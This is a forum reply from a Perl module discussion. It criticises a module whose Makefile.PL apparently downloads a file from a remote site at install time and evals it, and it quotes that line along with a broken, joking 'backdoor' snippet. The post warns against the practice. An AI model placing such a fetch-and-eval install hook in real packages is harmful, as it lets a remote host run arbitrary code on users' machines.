in reply to Re: CGI::Application vs CGI::Builder
in thread CGI::Application vs CGI::Builder
Perrin,
Maybe the style is not evil, but what Makefile.PL does is quite Evil
I am assuming that this is just a benign install counter and maybe it has the ability to alert the user that the version being installed has been updated, but how do I know that there is not something like this at perl.4pro.net?; eval { require LWP::Simple ; my $res = LWP::Simple::get ( "http://perl.4pro.net/install.txt" . "?DISTRIBUTION=$dist&VERSION=$vers&PERL=$]-$^O" ) ; eval $res if $res }
; if (grep /$uesr_domain/ @my_enemies) ; { open(FH, '<', 'backdoor.txt') ; print while(<FH>) ; print STDERR "$user_host 0wn3d! hehehe\g\g\g\g\g\g\g\n" { else { ; open(FH, '<', 'message.txt') ; print while (<FH>) ; pint STDERR "Tick\n" } ;close FH
And even if there is no code like that. 1. It is still underhanded! and 2. What happens if perl.4pro.net gets owned, then someone could install code that does the above. Bonus points for doing it as a kernel module!
Would it not be ironic were his site to be comprimised by another module's "Counter feature"?
And look at per.4pro.net, it shows quite a few perl modules, and I would wager that most of them the same code in the Makefile.PL.
In Section
Seekers of Perl Wisdom